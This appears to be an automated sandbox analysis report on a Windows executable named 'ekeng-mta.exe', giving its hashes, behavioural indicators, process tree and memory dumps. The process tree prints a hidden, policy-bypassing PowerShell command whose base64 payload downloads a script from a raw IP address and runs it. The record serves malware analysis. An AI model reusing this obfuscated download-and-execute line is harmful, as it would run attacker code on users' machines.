6d1374bb816d1e54b4cffae41830837e0c83985156a4b33f5dbce644bdb61de9

Resubmissions

23-09-2023 06:54

22-09-2023 05:10

max time kernel
118s
max time network
122s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
22-09-2023 05:10

Target

ekeng-mta.exe
Size

3.5MB
MD5

cbbad2e2170ee73c2bfdacdade718d29
SHA1

dcab4fafa0387c0b4f5b700763cea78afb092024
SHA256

3a679cb98f88d7d6bd84dcfe9717238c08c05942055bdb798103224e7f2f2ca9
SHA512

a4133f07ad8de23c82e164ee2bee32704efaf119cd4f1142145fca8688094b485317722db030e70fadeb8237a20dbded71f9340cafad8cdd982a1011da6fccca
SSDEEP

98304:R/YJIkkCBJroBdDv6Lj9uGQdT7Nx2Yn686n:R/0

Score

1^/10

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2696 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2696 powershell.exe

pid	process
2696	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2696	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

ekeng-mta.execmd.exe

description	pid	process	target process
PID 1936 wrote to memory of 1704	1936	ekeng-mta.exe	cmd.exe
PID 1936 wrote to memory of 1704	1936	ekeng-mta.exe	cmd.exe
PID 1936 wrote to memory of 1704	1936	ekeng-mta.exe	cmd.exe
PID 1704 wrote to memory of 2696	1704	cmd.exe	powershell.exe
PID 1704 wrote to memory of 2696	1704	cmd.exe	powershell.exe
PID 1704 wrote to memory of 2696	1704	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\ekeng-mta.exe
"C:\Users\Admin\AppData\Local\Temp\ekeng-mta.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -ep bypass -w hidden -e aQB3AHIAIABoAHQAdABwADoALwAvADEAMwA5AC4AOAA0AC4AMgAzADEALgAxADkAOQA6ADgAMAA4ADAALwBnAGUAdAAvAGoANgBGADIAZgBRAG4AUgBPADQALwBtAHQAYQAuAHAAcwAxACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAHwAIABpAGUAeAA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1704
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -w hidden -e aQB3AHIAIABoAHQAdABwADoALwAvADEAMwA5AC4AOAA0AC4AMgAzADEALgAxADkAOQA6ADgAMAA4ADAALwBnAGUAdAAvAGoANgBGADIAZgBRAG4AUgBPADQALwBtAHQAYQAuAHAAcwAxACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAHwAIABpAGUAeAA=
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2696

memory/1936-12-0x0000000000400000-0x000000000058F000-memory.dmp

Filesize
1.6MB

Download
memory/2696-4-0x000000001B390000-0x000000001B672000-memory.dmp

Filesize
2.9MB

Download
memory/2696-5-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

Filesize
32KB

Download
memory/2696-6-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/2696-7-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/2696-8-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2696-9-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2696-10-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2696-11-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download